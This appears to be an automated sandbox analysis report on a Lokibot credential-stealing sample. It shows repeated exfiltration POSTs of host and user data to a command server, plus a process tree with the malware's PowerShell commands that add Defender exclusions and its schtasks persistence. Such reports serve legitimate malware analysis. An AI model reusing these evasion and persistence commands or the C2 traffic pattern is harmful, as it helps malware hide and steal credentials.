Jan 10, 2025 23:40:53.286833048 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 10 Jan 2025 22:40:53 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
92	192.168.2.9	50072	94.156.177.41	80	8120	C:\Users\user\Desktop\oAUBqI6vQ7.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:40:53.445018053 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 145 Connection: close
Jan 10, 2025 23:40:53.449990988 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 33 00 30 00 35 00 30 00 39 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina305090TINA-PC0FDD42EE188E931437F4FBE2C
Jan 10, 2025 23:40:54.256181002 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 10 Jan 2025 22:40:54 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
93	192.168.2.9	50073	94.156.177.41	80	8120	C:\Users\user\Desktop\oAUBqI6vQ7.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:40:54.434813976 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 145 Connection: close
Jan 10, 2025 23:40:54.439683914 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 33 00 30 00 35 00 30 00 39 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina305090TINA-PC0FDD42EE188E931437F4FBE2C
Jan 10, 2025 23:40:55.149559021 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 10 Jan 2025 22:40:55 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
94	192.168.2.9	50074	94.156.177.41	80	8120	C:\Users\user\Desktop\oAUBqI6vQ7.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:40:55.311760902 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 145 Connection: close
Jan 10, 2025 23:40:55.316603899 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 33 00 30 00 35 00 30 00 39 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina305090TINA-PC0FDD42EE188E931437F4FBE2C
Jan 10, 2025 23:40:56.057795048 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 10 Jan 2025 22:40:55 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
95	192.168.2.9	50075	94.156.177.41	80	8120	C:\Users\user\Desktop\oAUBqI6vQ7.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:40:56.205900908 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 145 Connection: close
Jan 10, 2025 23:40:56.210746050 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 33 00 30 00 35 00 30 00 39 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina305090TINA-PC0FDD42EE188E931437F4FBE2C
Jan 10, 2025 23:40:56.939388037 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 10 Jan 2025 22:40:56 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
96	192.168.2.9	50076	94.156.177.41	80	8120	C:\Users\user\Desktop\oAUBqI6vQ7.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:40:57.153563976 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 145 Connection: close
Jan 10, 2025 23:40:57.158428907 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 33 00 30 00 35 00 30 00 39 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina305090TINA-PC0FDD42EE188E931437F4FBE2C
Jan 10, 2025 23:40:57.853509903 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 10 Jan 2025 22:40:57 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
97	192.168.2.9	50077	94.156.177.41	80	8120	C:\Users\user\Desktop\oAUBqI6vQ7.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:40:58.045705080 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 145 Connection: close
Jan 10, 2025 23:40:58.050720930 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 33 00 30 00 35 00 30 00 39 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina305090TINA-PC0FDD42EE188E931437F4FBE2C
Jan 10, 2025 23:40:58.781198025 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 10 Jan 2025 22:40:58 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
98	192.168.2.9	50078	94.156.177.41	80	8120	C:\Users\user\Desktop\oAUBqI6vQ7.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:40:58.932216883 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 145 Connection: close
Jan 10, 2025 23:40:58.937067986 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 33 00 30 00 35 00 30 00 39 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina305090TINA-PC0FDD42EE188E931437F4FBE2C
Jan 10, 2025 23:40:59.653239012 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 10 Jan 2025 22:40:59 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
99	192.168.2.9	50079	94.156.177.41	80	8120	C:\Users\user\Desktop\oAUBqI6vQ7.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:40:59.850042105 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 145 Connection: close
Jan 10, 2025 23:40:59.854825020 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 33 00 30 00 35 00 30 00 39 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina305090TINA-PC0FDD42EE188E931437F4FBE2C
Jan 10, 2025 23:41:00.555465937 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 10 Jan 2025 22:41:00 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
100	192.168.2.9	50080	94.156.177.41	80	8120	C:\Users\user\Desktop\oAUBqI6vQ7.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:41:00.705025911 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 145 Connection: close
Jan 10, 2025 23:41:00.709875107 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 33 00 30 00 35 00 30 00 39 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina305090TINA-PC0FDD42EE188E931437F4FBE2C
Jan 10, 2025 23:41:01.438971043 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 10 Jan 2025 22:41:01 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
101	192.168.2.9	50081	94.156.177.41	80	8120	C:\Users\user\Desktop\oAUBqI6vQ7.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:41:01.607443094 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 145 Connection: close
Jan 10, 2025 23:41:01.612215996 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 33 00 30 00 35 00 30 00 39 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina305090TINA-PC0FDD42EE188E931437F4FBE2C
Jan 10, 2025 23:41:02.325126886 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 10 Jan 2025 22:41:02 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
102	192.168.2.9	50082	94.156.177.41	80	8120	C:\Users\user\Desktop\oAUBqI6vQ7.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:41:02.606862068 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 145 Connection: close
Jan 10, 2025 23:41:02.611716986 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 33 00 30 00 35 00 30 00 39 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina305090TINA-PC0FDD42EE188E931437F4FBE2C

Target ID:	0
Start time:	17:39:23
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\oAUBqI6vQ7.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\oAUBqI6vQ7.exe"
Imagebase:	0xe50000
File size:	817'152 bytes
MD5 hash:	04E3FEF83680D0B3FCF172F1B095BFDE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1429235724.00000000042CE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1429235724.00000000042CE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1429235724.00000000042CE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1429235724.00000000042CE000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1429235724.00000000042CE000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1429235724.00000000042CE000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1429235724.00000000042E8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1429235724.00000000042E8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1429235724.00000000042E8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1429235724.00000000042E8000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1429235724.00000000042E8000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1429235724.00000000042E8000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1428115991.000000000326F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1428115991.000000000326F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1428115991.000000000326F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1428115991.000000000326F000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1428115991.000000000326F000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1428115991.000000000326F000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	17:39:25
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\oAUBqI6vQ7.exe"
Imagebase:	0x2e0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	17:39:26
Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	17:39:26
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\Xzacmv.exe"
Imagebase:	0x2e0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	17:39:26
Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	17:39:26
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\Xzacmv" /XML "C:\Users\user\AppData\Local\Temp\tmp9E72.tmp"
Imagebase:	0xc40000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	17:39:27
Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	17:39:27
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\oAUBqI6vQ7.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\oAUBqI6vQ7.exe"
Imagebase:	0x880000
File size:	817'152 bytes
MD5 hash:	04E3FEF83680D0B3FCF172F1B095BFDE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000009.00000002.2349385278.0000000000E08000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	17:39:29
Start date:	10/01/2025
Path:	C:\Users\user\AppData\Roaming\Xzacmv.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\Xzacmv.exe
Imagebase:	0x520000
File size:	817'152 bytes
MD5 hash:	04E3FEF83680D0B3FCF172F1B095BFDE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000000A.00000002.1477049418.0000000002AA7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000A.00000002.1477049418.0000000002AA7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.1477049418.0000000002AA7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 0000000A.00000002.1477049418.0000000002AA7000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 0000000A.00000002.1477049418.0000000002AA7000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000000A.00000002.1477049418.0000000002AA7000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000000A.00000002.1479318717.0000000003AAB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000A.00000002.1479318717.0000000003AAB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.1479318717.0000000003AAB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 0000000A.00000002.1479318717.0000000003AAB000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 0000000A.00000002.1479318717.0000000003AAB000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000000A.00000002.1479318717.0000000003AAB000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000000A.00000002.1479318717.0000000003AC5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000A.00000002.1479318717.0000000003AC5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.1479318717.0000000003AC5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 0000000A.00000002.1479318717.0000000003AC5000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 0000000A.00000002.1479318717.0000000003AC5000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000000A.00000002.1479318717.0000000003AC5000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 82%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	17:39:29
Start date:	10/01/2025
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff72d8c0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	12
Start time:	17:39:32
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\Xzacmv" /XML "C:\Users\user\AppData\Local\Temp\tmpB3BF.tmp"
Imagebase:	0xc40000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	17:39:32
Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	17:39:32
Start date:	10/01/2025
Path:	C:\Users\user\AppData\Roaming\Xzacmv.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\Xzacmv.exe"
Imagebase:	0x280000
File size:	817'152 bytes
MD5 hash:	04E3FEF83680D0B3FCF172F1B095BFDE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	17:39:32
Start date:	10/01/2025
Path:	C:\Users\user\AppData\Roaming\Xzacmv.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Xzacmv.exe"
Imagebase:	0xf90000
File size:	817'152 bytes
MD5 hash:	04E3FEF83680D0B3FCF172F1B095BFDE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000000F.00000002.1454881025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000F.00000002.1454881025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.1454881025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 0000000F.00000002.1454881025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 0000000F.00000002.1454881025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Loki_1, Description: Loki Payload, Source: 0000000F.00000002.1454881025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000000F.00000002.1454881025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 0000000F.00000002.1454881025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Has exited:	true

Show Windows behavior

